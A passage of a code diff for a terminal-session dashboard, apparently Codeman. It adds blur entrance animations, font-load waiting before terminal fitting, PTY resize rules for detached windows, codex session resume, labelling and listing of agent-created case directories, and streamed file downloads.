So the cost the rule exists to avoid is inherent to blurring a terminal at
all, and this style buys it knowingly: it is opt-in, OFF by default, bounded
to one ~520ms run when a session is opened (or switched to, with `Also on
every tab switch`), and the class comes straight back off. `will-change` is
still deliberately unset, per the base rule. Measured price on a headless
SwiftShader rasterizer with no GPU at all, i.e. the worst case: frame deltas
go 16.7ms -> 33.3ms for the length of the run, against 16.7ms flat for `fade`.
The blur must not change layout, or FitAddon would feed wrong dimensions into
resize() and through to the PTY. `filter` is paint-only (measured live: 178x38
before, during and after a run), and the property allowlist for every one of
these keyframes is pinned by test/entrance-animations.test.ts. */
html[data-term-anim="blur"] .terminal-container.term-enter {
animation-name: term-enter-blur;
animation-duration: calc(520ms * var(--anim-enter-scale, 1));
animation-timing-function: cubic-bezier(0.32, 0.72, 0, 1);
}
/* Opacity leads the blur - full opacity around 45%, blur still lifting - which
is what separates the effect from a plain cross-fade. */
@keyframes term-enter-blur {
0% { opacity: 0; filter: blur(14px); transform: scale(1.008); }
45% { opacity: 1; }
100% { opacity: 1; filter: blur(0px); transform: none; }
}
/* ── Connection-line entrance animations ───────────────────────────────────
`--line-len` is the measured path length, stamped inline by
_applyLineEntrances(); `--line-enter-delay` is negative when an entrance is
@@ -1393,6 +1475,26 @@ html[data-line-anim="packet"] .connection-line.line-enter {
100% { stroke-dashoffset: calc(-1 * var(--line-len)); opacity: 0; }
}
/* Blur, the line focuses in alongside a blurred tab and window. `filter` on an
SVG path takes CSS filter functions, so the blur simply rides in front of the
line's own glow (see --line-glow on .connection-line).
⚠ The 100% frame deliberately omits `opacity`, which makes the browser take
the endpoint from the element's own computed value: a subagent line rests at
0.9, a lineage line at 0.72, and a WORKING lineage line at 0.95. Pinning 0.9
here - as `line-enter-fade` above still does - lands every lineage line on the
wrong opacity and snaps it when the class comes off. */
html[data-line-anim="blur"] .connection-line.line-enter {
animation-name: line-enter-blur;
animation-duration: calc(380ms * var(--anim-enter-scale, 1));
animation-timing-function: cubic-bezier(0.32, 0.72, 0, 1);
}
@keyframes line-enter-blur {
0% { opacity: 0; filter: blur(5px) var(--line-glow); }
100% { filter: blur(0px) var(--line-glow); }
}
.anim-lab-check {
display: flex;
align-items: center;
@@ -5941,6 +6043,57 @@ body.touch-device .terminal-container .xterm .xterm-helper-textarea {
color: #ef4444;
}
/* Agent-created cases: the badge on a scratch case, and the bulk cleanup bar above
the list. Tokens only (no hardcoded ink), so the light skins repaint with the rest. */
.case-manage-tag-agent {
display: inline-block;
margin-left: 6px;
padding: 0 5px;
border: 1px solid var(--control-border);
border-radius: 3px;
background: var(--control-bg);
color: var(--text-muted);
font-size: 0.58rem;
font-weight: 500;
letter-spacing: 0.04em;
text-transform: uppercase;
vertical-align: 1px;
}
.case-manage-agent-bar {
display: flex;
align-items: center;
justify-content: space-between;
gap: 10px;
margin-bottom: 4px;
padding: 8px 10px;
border: 1px solid var(--control-border);
border-radius: 6px;
/* Sticky, and therefore OPAQUE: it is the first child of the scrolling list
(.case-manage-list is a 320px-tall flex scroller), so a translucent bar would
have case rows sliding visibly under it, and a static one would put the cleanup
button out of reach the moment a long case list is scrolled. */
position: sticky;
top: 0;
z-index: 1;
background: var(--bg-card);
}
.case-manage-agent-count {
font-size: 0.7rem;
color: var(--text-dim);
min-width: 0;
overflow: hidden;
text-overflow: ellipsis;
}
/* The shared .case-manage-btn is a 26px icon square; this one carries a word. */
.case-manage-btn-cleanup {
width: auto;
padding: 0 10px;
white-space: nowrap;
}
.toolbar-input {
padding: 0.4rem 0.5rem;
background: var(--bg-input);
@@ -9782,10 +9935,17 @@ kbd {
stroke-dasharray: 5 3;
fill: none;
opacity: 0.9;
/* Dark outline for contrast, vibrant blue glow */
filter: drop-shadow(0 0 2px rgba(0, 0, 0, 0.8))
drop-shadow(0 0 4px rgba(59, 130, 246, 0.8))
drop-shadow(0 0 8px rgba(59, 130, 246, 0.5));
/* Dark outline for contrast, vibrant blue glow. Held in a variable because the
`blur` line entrance animates `filter`: a keyframe listing only the blur would
drop the glow for the length of the run and pop it back at the end, and the
lineage lines below - whose glow is a different colour entirely, set per
element - make that obvious. Both of its keyframes say
`blur(N) var(--line-glow)`, so the function lists match and interpolate while
each kind of line keeps its own glow. */
--line-glow: drop-shadow(0 0 2px rgba(0, 0, 0, 0.8))
drop-shadow(0 0 4px rgba(59, 130, 246, 0.8))
drop-shadow(0 0 8px rgba(59, 130, 246, 0.5));
filter: var(--line-glow);
transition: opacity 0.2s, stroke-width 0.2s, filter 0.2s;
}
@@ -9879,8 +10039,10 @@ kbd {
stroke-dasharray: 5 5;
stroke-linecap: round;
opacity: 0.72;
filter: drop-shadow(0 0 2px rgba(0, 0, 0, 0.7)) drop-shadow(0 0 5px var(--lineage-color, var(--session-blue, #2b8fd9)))
--line-glow: drop-shadow(0 0 2px rgba(0, 0, 0, 0.7))
drop-shadow(0 0 5px var(--lineage-color, var(--session-blue, #2b8fd9)))
drop-shadow(0 0 11px var(--lineage-color, var(--session-blue, #2b8fd9)));
filter: var(--line-glow);
}
/* ⚠ OUTSIDE the reduced-motion block below on purpose. A working child is the case
+122 -14
View File
@@ -514,6 +514,11 @@ Object.assign(CodemanApp.prototype, {
} else {
this.fitAddon.fit();
}
// Whenever that first fit runs — on this line, or a frame or two later on
// the mobile-Safari branch above — it measures whatever font the browser has
// painted with so far, which is not necessarily the terminal font. Start the
// wait now so the buffer load can hold for it.
this._terminalFontReady = this._awaitTerminalFont();
// Register link provider for clickable file paths in Bash tool output
this.registerFilePathLinkProvider();
@@ -935,7 +940,10 @@ Object.assign(CodemanApp.prototype, {
// causes Ink to re-render at the new row count, garbling terminal output.
// Local fit() still runs so xterm knows the viewport size for scrolling.
const keyboardUp = typeof KeyboardHandler !== 'undefined' && KeyboardHandler.keyboardVisible;
if (this.activeSessionId && !keyboardUp) {
// Same yield as sendResize: never resize a PTY whose session is showing
// in its own window. Dragging the dashboard's border must not reshape it.
const detachedElsewhere = !this.isSoloWindow && this.detachedSessions?.has(this.activeSessionId);
if (this.activeSessionId && !keyboardUp && !detachedElsewhere) {
const dims = this.fitAddon.proposeDimensions();
// Enforce minimum dimensions to prevent layout issues
const cols = dims ? Math.max(dims.cols, MIN_COLS) : MIN_COLS;
@@ -2193,7 +2201,7 @@ Object.assign(CodemanApp.prototype, {
if (isLive && this.sessions.has(s.sessionId)) {
this.selectSession(s.sessionId);
} else {
this.resumeHistorySession(s.claudeSessionId || s.sessionId, s.workingDir || '', s.name, s.mode);
this.resumeHistorySession(s.claudeSessionId || s.sessionId, s.workingDir || '', s.name, s.mode, s.resumeId);
}
})
);
@@ -2436,7 +2444,7 @@ Object.assign(CodemanApp.prototype, {
} else {
// Resume by the Claude conversation UUID when present (resumed sessions
// carry theirs separately from their Codeman id).
this.resumeHistorySession(s.claudeSessionId || s.sessionId, s.workingDir || '', s.name, s.mode);
this.resumeHistorySession(s.claudeSessionId || s.sessionId, s.workingDir || '', s.name, s.mode, s.resumeId);
}
this.closeSessionManager?.();
closeMenu();
@@ -2904,7 +2912,7 @@ Object.assign(CodemanApp.prototype, {
return `w${startNumber}-${dirName}`;
},
async resumeHistorySession(sessionId, workingDir, existingName, mode) {
async resumeHistorySession(sessionId, workingDir, existingName, mode, resumeId) {
// Close the run mode menu if open
document.getElementById('runModeMenu')?.classList.remove('active');
// Close folder history modal if open
@@ -2942,19 +2950,27 @@ Object.assign(CodemanApp.prototype, {
grok: 'grokConfig',
omp: 'ompConfig',
}[effectiveMode];
// codex/gemini/antigravity have no wired continuation here yet (their
// configs use an exact conversation id, not a "continue most recent"
// flag, and the row's own `sessionId` is not verified to carry that
// id for these three modes) — `continuesSomething` below is what keeps
// their row from being retired for a resume that didn't actually
// continue anything.
// codex names a thread by an id of its own, not by Codeman's session id,
// so it continues only when the row carried that id: `resumeId` is set by
// the rollout scanner (codex-transcript.ts) and by nothing else, which is
// what stops a LIVE codex row — whose sessionId is Codeman's uuid — from
// asking codex for a thread that does not exist.
//
// gemini/antigravity still have no wired continuation here (same reason
// codex used to have none: an exact conversation id nothing supplies) —
// `continuesSomething` below is what keeps their row from being retired
// for a resume that didn't actually continue anything.
const codexResumeId = effectiveMode === 'codex' ? resumeId : undefined;
const modeConfig =
modeConfigKey
? { [modeConfigKey]: { continueSession: true } }
: effectiveMode === 'deepseek'
? { deepSeekConfig: { resumeSession: true } }
: {};
const continuesSomething = Boolean(modeConfigKey) || effectiveMode === 'deepseek';
: codexResumeId
? { codexConfig: { resumeSessionId: codexResumeId } }
: {};
const continuesSomething =
Boolean(modeConfigKey) || effectiveMode === 'deepseek' || Boolean(codexResumeId);
const createRes = await fetch('/api/sessions', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
@@ -2982,11 +2998,16 @@ Object.assign(CodemanApp.prototype, {
// as a duplicate — click it 3 times, see the same name 3 times. Claude
// rows are left alone: `sessionId` there is a claudeSessionId, which
// usually has no live/persisted Codeman session of its own to delete.
// Gated on `continuesSomething`: for codex/gemini/antigravity (no
// continuation wired above), this is really a FRESH session with no
// Gated on `continuesSomething`: for gemini/antigravity, and for a codex
// row carrying no `resumeId`, this is really a FRESH session with no
// relation to the old row's conversation, so retiring it would discard
// the old conversation with no recovery — worse than the duplicate row
// this guard exists to prevent for the modes that DO continue.
//
// A codex row that DOES continue passes this gate, but the DELETE is a
// no-op for it: `sessionId` there is codex's thread id and no Codeman
// session carries that id. Its duplicate is cleared from the other side
// instead, by the alias fold in gatherUnifiedInputs()/Session.
if (effectiveMode !== 'claude' && continuesSomething && sessionId !== newSessionId) {
fetch(`/api/sessions/${sessionId}?killMux=true`, { method: 'DELETE' }).catch(() => {});
}
@@ -3830,6 +3851,14 @@ Object.assign(CodemanApp.prototype, {
return;
}
// The pane belongs to the popup showing it, so this window has nothing to
// restore. Say so rather than reporting a size that was never sent — the
// same button in that window does the job.
if (!this.isSoloWindow && this.detachedSessions?.has(this.activeSessionId)) {
this.showToast('This session is sized by its own window', 'warning');
return;
}
const dims = this.getTerminalDimensions();
if (!dims) {
this.showToast('Could not determine terminal size', 'error');
@@ -4772,6 +4801,15 @@ Object.assign(CodemanApp.prototype, {
const resolved = window.CodemanTerminalFont.resolve(custom);
if (!this.terminal || this.terminal.options.fontFamily === resolved) return;
this.terminal.options.fontFamily = resolved;
// Changing the family at runtime is the same race as the boot-time one: the
// option write makes xterm re-measure immediately, against a family the
// browser may not have loaded. Re-arm the wait for the new stack and fit
// again once it settles, so the setting takes effect at the right size
// without needing a tab switch. The fit below still runs, so the terminal
// is never left unfitted if the wait is slow.
this._terminalFontReady = this._awaitTerminalFont().then(() => {
if (this.terminal?.options?.fontFamily === resolved) this.fitAddon?.fit();
});
this.fitAddon?.fit();
this._localEchoOverlay?.refreshFont();
this._predictiveEcho?.refreshFont();
@@ -4788,6 +4826,65 @@ Object.assign(CodemanApp.prototype, {
}
},
/**
* Wait for the terminal's own font, then make xterm re-measure against it.
*
* A character cell measured against a fallback font has a different width and
* height from one measured against the terminal font, so a fit taken too early
* produces the wrong column and row count. The correction then arrives after
* the buffer has been replayed, and the CLI redraws a frame that no longer
* matches what the terminal is showing.
*
* ⚠️ Waiting is not sufficient on its own, which is what the re-measure at the
* end is for. `FitAddon.proposeDimensions()` divides the container by a CACHED
* cell size, and xterm refreshes that cache only from `open()`, from a resize
* that actually changed the grid, and on a device-pixel-ratio change — nothing
* in it listens for font loading. So a fit that runs after the font arrives can
* still divide by the fallback cell, propose the grid it already has, and
* short-circuit before anything re-measures.
*
* `document.fonts.load` for each family is what actually REQUESTS the faces:
* the WebGL renderer rasterises glyphs through a canvas texture atlas, and
* canvas text never triggers a CSS font fetch, so `document.fonts.ready` can
* resolve with a face never having been asked for at all.
*
* Every step is best-effort and the whole thing is bounded, because a font
* request that never settles must not hold up the terminal: `FontFaceSet.ready`
* has no deadline of its own, and the caller awaits this in front of the buffer
* replay. Past the deadline we fit against whatever is painted, which is the
* old behaviour rather than a new failure.
*/
async _awaitTerminalFont() {
try {
if (typeof document === 'undefined' || !document.fonts?.load) return;
const size = this.terminal?.options?.fontSize || 14;
const families = String(this.terminal?.options?.fontFamily || '')
.split(',')
.map((family) => family.trim().replace(/^["']|["']$/g, ''))
.filter(Boolean)
// Only the faces that can supply the measured glyph are worth waiting on.
// The bundled symbols font is ~1.2MB and carries private-use-area glyphs
// only — xterm measures `W`, which it does not contain — so awaiting it
// puts a megabyte between the user and their first frame for nothing.
// Generic families match no FontFace at all.
.filter((family) => !TERMINAL_FONT_UNMEASURED.has(family.toLowerCase()));
const loaded = Promise.all(
families.map((family) => document.fonts.load(`${size}px "${family}"`).catch(() => {}))
).then(() => document.fonts.ready);
await Promise.race([loaded, new Promise((resolve) => setTimeout(resolve, TERMINAL_FONT_WAIT_MS))]);
} catch {
/* font loading is unavailable or failed — fit against whatever is painted */
}
// Force the cache refresh xterm will not do for us. Without this the wait
// buys nothing on the common path (see the warning above). Private API, as
// FitAddon itself is; guarded because a terminal can be disposed mid-wait.
try {
this.terminal?._core?._charSizeService?.measure();
} catch {
/* renderer not ready or internals moved — the next real resize re-measures */
}
},
/**
* Get terminal dimensions with minimum enforcement.
* Prevents extremely narrow terminals that cause vertical text wrapping.
@@ -4814,6 +4911,17 @@ Object.assign(CodemanApp.prototype, {
// Fit terminal to container before reading dimensions — ensures local
// terminal size matches what we report to the server PTY.
if (this.fitAddon) this.fitAddon.fit();
// One PTY cannot hold two sizes. A detached session is owned by its own
// window, and the dashboard's terminal is narrower than that window because
// the session rail takes width the popup does not have — so both sizing it
// makes the CLI draw frames that fit neither, which garbles the popup. The
// dashboard yields; the solo window sizes what it alone displays.
// (_maybeRefetchFullHistory already stands aside for the same reason.)
// ⚠️ AFTER the fit, never before: the local reflow keeps the dashboard's own
// xterm right, and only the SERVER write is the dashboard's to withhold —
// the mobile-keyboard guard below draws exactly this line. tab-rail-resize
// performs its one settle-time refit through this call and has no fallback.
if (!this.isSoloWindow && this.detachedSessions?.has(sessionId)) return false;
const dims = this.getTerminalDimensions();
if (!dims) return false;
// Did the dimensions actually change since the last resize we sent? Callers
+28
View File
@@ -23,6 +23,7 @@ import { dataPath } from '../config/instance.js';
import { getCasesDir } from '../config/cases-dir.js';
import { isMultiUserMode, maxSessionsPerUser, userCasesDir } from '../config/multiuser.js';
import { SYNTHETIC_ADMIN, findUser } from '../user-store.js';
import { AGENT_ORIGIN_SPAWNED_BY_SESSION, normalizeAgentOrigin } from '../agent-case-marker.js';
// Shared path constants used across route modules. CASES_DIR (project folders)
// stays shared across instances; SETTINGS_PATH is per-instance runtime state.
@@ -361,6 +362,33 @@ export function resolveParentSessionId(
return parent.id;
}
/**
* Resolve "an agent asked for this", the signal that labels a case directory
* Codeman is about to CREATE as an agent scratch workspace (see agent-case-marker.ts).
*
* Two signals, in order:
* 1. an explicit `agentOrigin` body field, or the `X-Codeman-Agent-Origin` header the
* packaged skill sets once on its shared curl invocation, so every spawn recipe
* carries it without a per-recipe edit. The body wins, mirroring parentSessionId;
* 2. failing that, an already-RESOLVED parent session id. A create request that names
* the session that spawned it came from an agent by construction: nothing in the
* browser UI sets lineage. This is what still labels workers spawned by a stale
* skill copy or by hand-rolled curl that only carries the lineage header.
*
* ⚠️ Decoration, like parentSessionId: never an ownership or permission signal, and
* never a reason to fail a spawn. An unrecognised origin token is dropped by
* `normalizeAgentOrigin` rather than rejected.
*/
export function resolveAgentCaseOrigin(
req: FastifyRequest,
bodyValue: string | undefined,
resolvedParentSessionId: string | undefined
): string | undefined {
const header = req.headers['x-codeman-agent-origin'];
const raw = bodyValue ?? (Array.isArray(header) ? header[0] : header);
return normalizeAgentOrigin(raw) ?? (resolvedParentSessionId ? AGENT_ORIGIN_SPAWNED_BY_SESSION : undefined);
}
/**
* Parse and validate a request body against a Zod schema, or throw a structured 400 error.
* Replaces the repeated pattern: `const r = Schema.safeParse(body); if (!r.success) return createErrorResponse(...)`.
+87 -3
View File
@@ -13,7 +13,15 @@ import fs from 'node:fs/promises';
import { join, resolve, basename } from 'node:path';
import { fileURLToPath } from 'node:url';
import { homedir } from 'node:os';
import type { ApiResponse, CaseInfo, DockerHost, RemoteSessionInfo, SessionDocker, SessionMode } from '../../types.js';
import type {
AgentCaseSummary,
ApiResponse,
CaseInfo,
DockerHost,
RemoteSessionInfo,
SessionDocker,
SessionMode,
} from '../../types.js';
import { ApiErrorCode, createErrorResponse, getErrorMessage } from '../../types.js';
import {
CreateCaseSchema,
@@ -42,6 +50,7 @@ import {
} from '../../git-clone.js';
import type { GitRemoteProbe, GitUrlParse } from '../../git-clone.js';
import { generateClaudeMd } from '../../templates/claude-md.js';
import { readAgentCaseMarker, type AgentCaseMarker } from '../../agent-case-marker.js';
import { settingsWriteBlocker, writeHooksConfig } from '../../hooks-config.js';
import {
canAccessOwned,
@@ -144,6 +153,21 @@ function repoShipsClaudeSettings(casePath: string): boolean {
return ['settings.json', 'settings.local.json'].some((file) => existsSync(join(casePath, '.claude', file)));
}
/**
* Project a case's marker onto the wire shape `CaseInfo.agentCreated` carries.
* `owner` stays server-side: the listings are already owner-scoped, and it is not
* something the case list needs to publish.
*/
function agentCreatedInfo(marker: AgentCaseMarker): NonNullable<CaseInfo['agentCreated']> {
return {
createdAt: marker.createdAt,
createdBy: marker.createdBy,
...(marker.parentSessionId ? { parentSessionId: marker.parentSessionId } : {}),
...(marker.parentSessionName ? { parentSessionName: marker.parentSessionName } : {}),
...(marker.mode ? { mode: marker.mode } : {}),
};
}
/** Read and parse linked-cases.json, returning empty object on missing/invalid file. */
async function readLinkedCases(): Promise<Record<string, string>> {
return readJsonConfig<Record<string, string>>(LINKED_CASES_FILE, 'linked cases', {});
@@ -222,11 +246,16 @@ export function registerCaseRoutes(app: FastifyInstance, ctx: EventPort & Config
const entries = await fs.readdir(listBase, { withFileTypes: true });
for (const e of entries) {
if (e.isDirectory() && SAFE_CASE_NAME.test(e.name)) {
const casePath = join(listBase, e.name);
// Only a directory Codeman scaffolded for an agent spawn carries a marker,
// so this stays absent for every human-created, linked or cloned case.
const marker = await readAgentCaseMarker(casePath);
cases.push({
name: e.name,
path: join(listBase, e.name),
hasClaudeMd: existsSync(join(listBase, e.name, 'CLAUDE.md')),
path: casePath,
hasClaudeMd: existsSync(join(casePath, 'CLAUDE.md')),
location: 'local',
...(marker ? { agentCreated: agentCreatedInfo(marker) } : {}),
});
}
}
@@ -326,6 +355,61 @@ export function registerCaseRoutes(app: FastifyInstance, ctx: EventPort & Config
return cases;
});
// ========== Agent-created cases (cleanup listing) ==========
/**
* The scratch workspaces agent workers left behind, newest first.
*
* A long orchestration creates one case directory per worker, and deleting the
* sessions does not remove them, so without this the only way to tell an agent's
* `alpha`/`beta` from a real project was to remember which was which. Reads the same
* marker `GET /api/cases` exposes and adds the two facts a human needs before
* deleting a directory: whether a live session is still working in it, and when it
* was last touched.
*
* ⚠️ Read-only on purpose: removal goes through the existing `DELETE /api/cases/:name`,
* one name at a time, so this file keeps exactly one recursive-delete path. Scoped by
* construction — it only ever walks the caller's own case space.
*/
app.get('/api/cases/agent-created', async (req): Promise<ApiResponse<{ cases: AgentCaseSummary[] }>> => {
const user = getAuthUser(req);
const listBase = resolveCasesDir(user);
const inUsePaths = new Set(
Array.from(ctx.sessions.values())
.filter((session) => canAccessOwned(user, session.owner))
.map((session) => session.workingDir)
);
let entries;
try {
entries = await fs.readdir(listBase, { withFileTypes: true });
} catch {
return { success: true, data: { cases: [] } }; // case space not created yet
}
const summaries: AgentCaseSummary[] = [];
for (const entry of entries) {
if (!entry.isDirectory() || !SAFE_CASE_NAME.test(entry.name)) continue;
const casePath = join(listBase, entry.name);
const marker = await readAgentCaseMarker(casePath);
if (!marker) continue;
const modifiedAt = await fs
.stat(casePath)
.then((stat) => stat.mtime.toISOString())
.catch(() => undefined);
summaries.push({
name: entry.name,
path: casePath,
...agentCreatedInfo(marker),
inUse: inUsePaths.has(casePath),
...(modifiedAt ? { modifiedAt } : {}),
});
}
summaries.sort((a, b) => b.createdAt.localeCompare(a.createdAt));
return { success: true, data: { cases: summaries } };
});
app.post('/api/cases', async (req): Promise<ApiResponse<{ case: { name: string; path: string } }>> => {
const { name, description } = parseBody(CreateCaseSchema, req.body);
+16 -41
View File
@@ -50,6 +50,7 @@ import {
} from '../route-helpers.js';
import type { FastifyRequest } from 'fastify';
import type { SessionAttachmentHistoryItem, SessionState } from '../../types/session.js';
import { downloadTooLargeMessage, exceedsDownloadLimit } from '../../config/buffer-limits.js';
import { parseByteRange } from '../http-range.js';
import { isSensitivePath } from '../sensitive-path.js';
import { SseEvent } from '../sse-events.js';
@@ -183,16 +184,8 @@ async function serveRawFile(
rangeHeader?: string | string[]
): Promise<void> {
const stat = await fs.stat(resolvedPath);
const MAX_RAW_ATTACHMENT_SIZE = 50 * 1024 * 1024; // 50MB, matching file-raw / download
if (stat.size > MAX_RAW_ATTACHMENT_SIZE) {
reply
.code(413)
.send(
createErrorResponse(
ApiErrorCode.INVALID_INPUT,
`File too large (${Math.round(stat.size / 1024 / 1024)}MB > ${MAX_RAW_ATTACHMENT_SIZE / 1024 / 1024}MB limit)`
)
);
if (exceedsDownloadLimit(stat.size)) {
reply.code(413).send(createErrorResponse(ApiErrorCode.INVALID_INPUT, downloadTooLargeMessage(stat.size)));
return;
}
// Markup is download-only: served with a renderable type on our own origin it
@@ -1562,18 +1555,11 @@ export function registerFileRoutes(app: FastifyInstance, ctx: SessionPort & Even
const { resolvedPath } = validated;
try {
// Validate file size before reading (DoS protection - prevent memory exhaustion)
const MAX_RAW_FILE_SIZE = 50 * 1024 * 1024; // 50MB for raw files
// Sanity bound only: the body below is streamed and Range-aware, so size
// does not translate into resident memory. Configurable, 0 = unlimited.
const stat = await fs.stat(resolvedPath);
if (stat.size > MAX_RAW_FILE_SIZE) {
reply
.code(400)
.send(
createErrorResponse(
ApiErrorCode.INVALID_INPUT,
`File too large (${Math.round(stat.size / 1024 / 1024)}MB > ${MAX_RAW_FILE_SIZE / 1024 / 1024}MB limit)`
)
);
if (exceedsDownloadLimit(stat.size)) {
reply.code(413).send(createErrorResponse(ApiErrorCode.INVALID_INPUT, downloadTooLargeMessage(stat.size)));
return;
}
@@ -1954,17 +1940,8 @@ export function registerFileRoutes(app: FastifyInstance, ctx: SessionPort & Even
return;
}
// 50MB size limit
const MAX_DOWNLOAD_SIZE = 50 * 1024 * 1024;
if (stat.size > MAX_DOWNLOAD_SIZE) {
reply
.code(400)
.send(
createErrorResponse(
ApiErrorCode.INVALID_INPUT,
`File too large (${Math.round(stat.size / 1024 / 1024)}MB > 50MB limit)`
)
);
if (exceedsDownloadLimit(stat.size)) {
reply.code(413).send(createErrorResponse(ApiErrorCode.INVALID_INPUT, downloadTooLargeMessage(stat.size)));
return;
}
@@ -1988,15 +1965,13 @@ export function registerFileRoutes(app: FastifyInstance, ctx: SessionPort & Even
};
const filename = pathBasename(resolvedPath);
const content = await fs.readFile(resolvedPath);
// Bypass Fastify compression — write directly to raw response
reply.raw.writeHead(200, {
...inheritedHeaders(reply),
'Content-Type': mimeTypes[ext] || 'application/octet-stream',
'Content-Disposition': `attachment; filename="${filename}"`,
'Content-Length': content.length,
});
reply.raw.end(content);
// Streamed rather than read into memory, and Range-aware, so a multi-GB
// artifact costs one read stream and can be resumed. sendFileBody()
// hijacks the reply, which also keeps Fastify's compression out of it.
reply.header('Content-Type', mimeTypes[ext] || 'application/octet-stream');
reply.header('Content-Disposition', buildContentDisposition('attachment', filename));
reply.header('X-Content-Type-Options', 'nosniff');
sendFileBody(reply, resolvedPath, stat.size, req.headers.range);
return;
} catch (err) {
reply
+104 -5
View File
@@ -76,12 +76,14 @@ import {
ownerFor,
parseBody,
persistAndBroadcastSession,
resolveAgentCaseOrigin,
resolveCasesDir,
resolveParentSessionId,
sessionCapacityMessage,
SETTINGS_PATH,
validatePathWithinBase,
} from '../route-helpers.js';
import { buildAgentCaseMarker, writeAgentCaseMarker } from '../../agent-case-marker.js';
import { canUsernameRunPrivilegedCommands, resolveClaudeModeForUsername } from '../../user-store.js';
import { enabledClis, getCli } from '../../config/cli-registry/registry.js';
import { resolveCliLaunchError } from '../../utils/cli-launcher.js';
@@ -146,6 +148,7 @@ import {
import { LRUMap } from '../../utils/lru-map.js';
import { findLatestOmpSessionId } from '../../utils/omp-session-resolver.js';
import { scanOmpSessionsHistory } from '../../omp-transcript.js';
import { scanCodexSessionsHistory, codexThreadBySessionId } from '../../codex-transcript.js';
import {
getLastTranscriptResponse,
isExternalCliTranscriptMode,
@@ -2600,6 +2603,12 @@ export function registerSessionRoutes(
? 'mux-full-history'
: 'mux-visible'
: 'history';
// What the three row-preserving skips below must key on. `isFullReload` is
// only what the CLIENT ASKED FOR: when the capture comes back null — ENOBUFS,
// a timeout, a vanished pane, or a session with no mux at all — rawBuffer
// falls back to the byte history, which is a stream of successive frames with
// no row alignment to protect and every reason to be stripped.
const isFullCapture = isFullReload && hasLiveMuxBuffer;
let rawBuffer: string;
if (liveMuxBuffer !== null && liveMuxBuffer.length > 0) {
// Full-history capture is the RENDERED form of everything already in the
@@ -2646,8 +2655,16 @@ export function registerSessionRoutes(
// During long thinking phases, Ink rewrites the same rows thousands of times
// (500KB+). Without stripping, tail mode returns only spinner frames and
// the terminal appears empty when switching tabs.
// A full reload's buffer IS the rendered pane, one line per screen row, and
// it ends with an absolute cursor move back to the pane's own position.
// Every transform below that can DELETE A LINE would shift the rows out from
// under that position, leaving the caret a row off — on the composer's
// border rather than its input line. Redraw-bloat stripping exists for a
// byte stream of successive frames; a capture holds no successive frames.
let strippedBuffer =
getCli(session.mode)?.capabilities.stripInkBloat === false ? rawBuffer : stripInkRedrawBloat(rawBuffer);
isFullCapture || getCli(session.mode)?.capabilities.stripInkBloat === false
? rawBuffer
: stripInkRedrawBloat(rawBuffer);
// Strip alt-screen toggles and scrollback-erase from Codex/Claude byte
// streams. xterm.js obeys them by switching to its scrollback-less alt
@@ -2685,7 +2702,10 @@ export function registerSessionRoutes(
cleanBuffer = strippedBuffer;
// Find where Claude banner starts (has color codes before "Claude")
const claudeMatch = cleanBuffer.match(CLAUDE_BANNER_PATTERN);
// Skipped for a full reload: the banner sits at whatever row the pane has
// it, and cutting to it would drop the blank rows above and move every
// row up by that many.
const claudeMatch = isFullCapture ? null : cleanBuffer.match(CLAUDE_BANNER_PATTERN);
if (claudeMatch && claudeMatch.index !== undefined && claudeMatch.index > 0) {
let lineStart = claudeMatch.index;
while (lineStart > 0 && cleanBuffer[lineStart - 1] !== '\n') {
@@ -2696,7 +2716,11 @@ export function registerSessionRoutes(
}
// Remove Ctrl+L and leading whitespace (cheap on tailed subset)
cleanBuffer = cleanBuffer.replace(CTRL_L_PATTERN, '').replace(LEADING_WHITESPACE_PATTERN, '');
// Leading whitespace goes too, except on a full reload where a leading
// blank line is the pane's own first row and dropping it shifts every row
// up by one.
cleanBuffer = cleanBuffer.replace(CTRL_L_PATTERN, '');
if (!isFullCapture) cleanBuffer = cleanBuffer.replace(LEADING_WHITESPACE_PATTERN, '');
const finishedAt = performance.now();
reply.header(
@@ -2973,8 +2997,13 @@ export function registerSessionRoutes(
envOverrides,
effort,
parentSessionId,
agentOrigin,
} = parseBody(QuickStartSchema, req.body);
// Resolved ONCE here: the same value labels a case directory this request creates
// (agent-case-marker.ts) and draws the tab lineage line on the session below.
const qsParentSessionId = resolveParentSessionId(ctx, req, parentSessionId, owner);
// Multi-user: shell mode is arbitrary host-account execution, gated by the grant.
// Resolve the owner's grant from the store so a GRANTED regular user is not wrongly denied.
if (getCli(mode)?.capabilities.privilegedCommandGate && !(await canUsernameRunPrivilegedCommands(owner))) {
@@ -3220,6 +3249,26 @@ export function registerSessionRoutes(
await writeHooksConfig(resolvedCasePath);
}
// Label a directory an AGENT asked us to create, so the scratch workspaces a
// long orchestration leaves behind can be told apart from the user's real
// projects later (see agent-case-marker.ts). This is the only branch that may
// write it: it is the only one that creates the directory, and a pre-existing
// case must never be labelled. Best-effort — a failed marker must not fail the
// spawn it decorates.
const qsAgentOrigin = resolveAgentCaseOrigin(req, agentOrigin, qsParentSessionId);
if (qsAgentOrigin) {
await writeAgentCaseMarker(
resolvedCasePath,
buildAgentCaseMarker({
createdBy: qsAgentOrigin,
parentSessionId: qsParentSessionId,
parentSessionName: qsParentSessionId ? ctx.sessions.get(qsParentSessionId)?.name : undefined,
mode,
owner,
})
);
}
ctx.broadcast(SseEvent.CaseCreated, { name: caseName, path: resolvedCasePath });
} catch (err) {
return createErrorResponse(ApiErrorCode.OPERATION_FAILED, `Failed to create case: ${getErrorMessage(err)}`);
@@ -3353,7 +3402,7 @@ export function registerSessionRoutes(
docker,
resumeSessionId: dockerResumeId,
tmuxHistoryLimit: qsTerminalHistoryConfig.tmuxHistoryLimit,
parentSessionId: resolveParentSessionId(ctx, req, parentSessionId, owner),
parentSessionId: qsParentSessionId,
});
// Auto-detect completion phrase from CLAUDE.md BEFORE broadcasting
@@ -4137,6 +4186,13 @@ export function registerSessionRoutes(
// Persisted sessions (state.json). resumeSessionId is the Claude
// conversation UUID a resumed session continues — feed it to the merge's
// alias map so its transcript row folds into this session.
//
// codex keeps its thread id in `codexConfig` instead, and state.json stores
// that, so read it here as well. Without it a resumed codex session that has
// been demoted to a persisted-only record loses its alias and duplicates: the
// originator fallback below cannot rescue that one, because a RESUMED rollout
// keeps the original session_meta (see findActiveCodexFile) and so still
// names whichever pane first created the thread.
const persisted: PersistedSessionInput[] = Object.values(ctx.store.getState().sessions).map((p) => ({
id: p.id,
name: p.name,
@@ -4145,7 +4201,7 @@ export function registerSessionRoutes(
workingDir: p.workingDir,
createdAt: p.createdAt,
lastActivityAt: p.lastActivityAt,
claudeSessionId: p.resumeSessionId,
